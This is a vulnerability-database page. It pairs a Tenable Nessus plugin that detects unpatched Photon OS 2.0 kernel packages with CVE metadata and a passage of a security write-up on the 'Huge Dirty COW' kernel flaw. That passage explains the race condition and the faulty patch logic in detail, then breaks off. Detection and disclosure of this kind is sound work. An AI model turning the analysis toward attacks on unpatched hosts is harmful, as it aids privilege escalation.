ID PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL Type nessus Reporter This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
An update of the linux package has been released.
#
# (C) Tenable Network Security, Inc.`
#
# The descriptive text and package checks in this plugin were
# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text
# itself is copyright (C) VMware, Inc.
include("compat.inc");
if (description)
{
script_id(121792);
script_version("1.3");
script_cvs_date("Date: 2019/04/02 21:54:17");
script_cve_id("CVE-2017-1000405", "CVE-2017-1000407");
script_name(english:"Photon OS 2.0: Linux PHSA-2017-2.0-0008");
script_summary(english:"Checks the rpm output for the updated packages.");
script_set_attribute(attribute:"synopsis", value:
"The remote PhotonOS host is missing multiple security updates.");
script_set_attribute(attribute:"description", value:
"An update of the linux package has been released.");
script_set_attribute(attribute:"see_also", value:"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md");
script_set_attribute(attribute:"solution", value:
"Update the affected Linux packages.");
script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-1000405");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/28");
script_set_attribute(attribute:"patch_publication_date", value:"2017/12/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2019/02/07");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:vmware:photonos:linux");
script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:photonos:2.0");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"PhotonOS Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/PhotonOS/release", "Host/PhotonOS/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/PhotonOS/release");
if (isnull(release) || release !~ "^VMware Photon") audit(AUDIT_OS_NOT, "PhotonOS");
if (release !~ "^VMware Photon (?:Linux|OS) 2\.0(\D|$)") audit(AUDIT_OS_NOT, "PhotonOS 2.0");
if (!get_kb_item("Host/PhotonOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "PhotonOS", cpu);
flag = 0;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-api-headers-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-drivers-gpu-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-oprofile-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-lkcm-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-sound-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-tools-4.9.71-1.ph2")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : rpm_report_get()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "linux");
}
{"id": "PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL", "bulletinFamily": "scanner", "title": "Photon OS 2.0: Linux PHSA-2017-2.0-0008", "description": "An update of the linux package has been released.", "published": "2019-02-07T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/121792", "reporter": "This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://github.com/vmware/photon/wiki/Security-Updates-2-8.md"], "cvelist": ["CVE-2017-1000407", "CVE-2017-1000405"], "type": "nessus", "lastseen": "2021-01-01T01:07:04", "edition": 17, "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000405", "CVE-2017-1000407"]}, {"type": "seebug", "idList": ["SSV:96908"]}, {"type": "virtuozzo", "idList": ["VZA-2017-109", "VZA-2017-110", "VZA-2017-111", "VZA-2018-004"]}, {"type": "nessus", "idList": ["FEDORA_2017-B0C1F44130.NASL", "FEDORA_2017-9EA11E444D.NASL", "PHOTONOS_PHSA-2017-2_0-0008_WGET.NASL", "UBUNTU_USN-3511-1.NASL", "ORACLELINUX_ELSA-2018-4017.NASL", "ORACLEVM_OVMSA-2018-0012.NASL", "SUSE_SU-2017-3226-1.NASL", "VIRTUOZZO_VZA-2017-111.NASL", "UBUNTU_USN-3510-1.NASL", "VIRTUOZZO_VZA-2017-110.NASL"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F"]}, {"type": "exploitdb", "idList": ["EDB-ID:44305", "EDB-ID:43199"]}, {"type": "fedora", "idList": ["FEDORA:22E2B607603F", "FEDORA:3CCDE601B23D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843396", "OPENVAS:1361412562310843398", "OPENVAS:1361412562310843400", "OPENVAS:1361412562310843403", "OPENVAS:1361412562310873860", "OPENVAS:1361412562310843394", "OPENVAS:1361412562310843397", "OPENVAS:1361412562310843402", "OPENVAS:1361412562310873857", "OPENVAS:1361412562310843393"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4017", "ELSA-2017-3651"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3319-1", "SUSE-SU-2017:3317-1", "SUSE-SU-2017:3300-1", "SUSE-SU-2017:3324-1", "SUSE-SU-2017:3285-1", "SUSE-SU-2017:3225-1", "SUSE-SU-2017:3314-1", "SUSE-SU-2017:3226-1", "SUSE-SU-2017:3297-1", "SUSE-SU-2017:3284-1"]}, {"type": "ubuntu", "idList": ["USN-3510-1", "USN-3510-2", "USN-3509-3", "USN-3511-1", "USN-3507-2", "USN-3509-2", "USN-3509-4", "USN-3508-2", "USN-3509-1", "USN-3508-1"]}, {"type": "redhat", "idList": ["RHSA-2018:0180", "RHSA-2019:1170"]}, {"type": "threatpost", "idList": ["THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087"]}, {"type": "amazon", "idList": ["ALAS-2017-937", "ALAS2-2018-956", "ALAS-2018-956"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A"]}], "modified": "2021-01-01T01:07:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-01T01:07:04", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121792);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-1000407\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2017-2.0-0008\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000405\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-api-headers-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-oprofile-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.71-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "naslFamily": "PhotonOS Local Security Checks", "pluginID": "121792", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "scheme": null, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.", "edition": 18, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2017-12-11T21:29:00", "title": "CVE-2017-1000407", "type": "cve", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000407"], "modified": "2019-05-14T22:29:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:linux:linux_kernel:4.15", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:redhat:virtualization_host:4.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-1000407", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000407", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original \"Dirty cow\" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.", "edition": 16, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-30T22:29:00", "title": "CVE-2017-1000405", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000405"], "modified": "2018-02-13T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.14"], "id": "CVE-2017-1000405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000405", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-12-25T18:30:18", "description": "The \u201cDirty COW\u201d vulnerability ([CVE-2016\u20135195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast\u200a\u2014\u200amillions of users could be compromised easily and reliably, bypassing common exploit defenses.\r\n\r\nPlenty of information was published about the vulnerability, but its patch was not analyzed in detail.\r\n\r\nWe at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.\r\n\r\n### \"Dirty COW\" recap\r\nFirst, we need a full understanding of the original Dirty COW exploit. We\u2019ll assume basic understanding of the Linux memory manager. We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit, however the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE flag` is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact the we went through a COW cycle. On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified, and that the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux usually uses a 4096-bytes long pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is a 2MB long page. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. can be split into normal 4096-bytes pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mapping only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Medium Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. A matching function called `can_follow_write_pm`d was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by `follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is straightforward\u200a\u2014\u200awe can use a similar pattern of the original Dirty COW race. This time, after we get rid 